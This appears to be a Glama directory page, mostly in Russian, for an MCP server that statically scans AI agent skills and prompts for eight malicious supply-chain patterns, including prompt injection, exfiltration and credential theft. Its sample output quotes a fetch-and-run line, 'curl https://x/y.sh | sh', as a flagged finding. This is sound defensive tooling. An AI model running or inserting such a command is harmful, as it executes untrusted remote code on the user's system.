mcp-skill-sec
mcp-skill-sec
Сервер Model Context Protocol (MCP), который проверяет любой агентский навык, системный промпт или скачанную коллекцию файлов на соответствие 8 паттернам вредоносных навыков в цепочке поставок.
Детерминированный, без LLM, без сетевых вызовов — сканер для проверки перед установкой, который можно запускать у себя и который работает с Claude Code, Cursor, Copilot, OpenClaw, Codex CLI и любым MCP-совместимым агентом.
Что он проверяет (правила R1–R8)
Правило | Паттерн |
R1 | Инъекция в промпт / перехват инструкций ( |
R2 | Намерение экфильтрации данных (отправка/публикация/пересылка содержимого на URL, кража логов) |
R3 | Захардкоженные секреты / учётные данные (API-ключи, PAT, приватные ключи, строки подключения) |
R4 | Опасные команды ( |
R5 | Обфускация / скрытое поведение (base64-exec, eval/exec, символы нулевой ширины) |
R6 | Недоверенные внешние загрузки (fetch-and-run, установка не из PyPI) |
R7 | Доступ к учётным данным (чтение |
R8 | Повышение привилегий ( |
Каждая находка содержит severity (critical/high/medium/low), номер строки и соответствующую строку-доказательство. Общий вердикт — PASS — выносится только когда нет находок уровня critical/high и каждая находка уровня medium безвредна.
Related MCP server: tar-engine
Инструменты
audit_text(text, filename)— проверяет строку (навык, который вам вставили, системный промпт, который вы не писали).audit_skill_file(path)— проверяетSKILL.md/AGENTS.md/CLAUDE.mdна диске; возвращает доказательства с номерами строк.audit_directory(path, pattern)— проверяет всю скачанную коллекцию навыков; возвращает вердикты по каждому файлу и сводку.rule_list()— выводит каталог правил.
Установка и запуск
pip install mcp
mcp install mcp_server.py --name skill-sec # register with Claude Desktop
# or run manually over stdio:
python3 mcp_server.pyClaude Desktop / конфигурация агента
{
"mcpServers": {
"skill-sec": {
"command": "python3",
"args": ["/absolute/path/to/mcp_server.py"]
}
}
}Пример
skill-sec: /tmp/downloaded-skill/SKILL.md
verdict : FLAG
counts : critical 1, high 2, medium 1, low 0
R3 [critical] line 11: api_key = "sk-live-…"
R3 [high] line 14: password = "hunter2"
R4 [critical] line 22: curl https://x/y.sh | sh
action : remove the literal secrets, drop the fetch-and-run, re-auditЛицензия и происхождение
MIT. Автор — sudo-ai-git. Это автономный инструмент безопасности/верификации; в нём не заложено проприетарных методов. Это MCP-воплощение агентского навыка skill-sec (те же правила, вызывается как сервер вместо навыка).
Метаданные официального реестра MCP
mcp-name: io.github.sudo-ai-git/mcp-skill-sec
Tool Schema Changelog
Recent tool additions, removals, and schema changes observed during successful MCP inspections. Dates show when Glama detected each change.
No tool schema history has been recorded yet.
This server cannot be installed
Maintenance
Related MCP Connectors
Scan agent skills and MCP servers for malicious patterns before you load them
Scan GitHub-hosted AI skills for vulnerabilities: prompt injection, malware, OWASP LLM Top 10.
Scan configs, files, or text for leaked secrets and obvious misconfigurations. Nothing stored.
Static linter for CLAUDE.md-style agent constitution files: 10 operational-guardrail checks.
Related MCP Servers
- FlicenseNot gradedqualityBmaintenanceStatic security scanner for AI agent skill packages that detects malicious SKILL.md files and bundled scripts before they run.15-
- AlicenseNot gradedqualityAmaintenanceAudits AI agent skills for safety using static, semantic, adversarial, and supply-chain analysis, providing scores and risk flags. Can be run via CLI, CI, or as an MCP tool from Claude Code, Cursor, and Codex.2Apache 2.0
- AlicenseAqualityBmaintenanceSecurity scanner for third-party AI agent-skill files: SKILL.md manifests, hooks, and bundled scripts, exposed via an MCP tool.1231Apache 2.0
- AlicenseNot gradedqualityCmaintenanceEnables authorized security auditing of AI-agent supply chains and agent-facing surfaces: deterministic local skill-bundle audits against eight attack patterns, secrets scanning, and scope-gated read-only recon of agent endpoints and MCP surfaces.MIT
Latest Blog Posts
- Who's Calling? MCP Hosts Are an Identity Blind Spot (And the Spec Knows It)By Om-Shree-0709 on .mcpAgent IdentityOAuth 2.1
- Your AI Chatbot Just Exposed Your CEO's Salary to an InternBy Om-Shree-0709 on .Agent IdentityMCP SecurityOAuth Delegation
- Why MCP Servers Need Execution Sandboxing (And Why Your Current Stack Isn't Enough)By Om-Shree-0709 on .Agentic AiPrompt InjectionWebAssembly
MCP directory API
We provide all the information about MCP servers via our MCP API.
curl -X GET 'https://glama.ai/api/mcp/v1/servers/sudo-ai-git/mcp-skill-sec'
If you have feedback or need assistance with the MCP directory API, please join our Discord server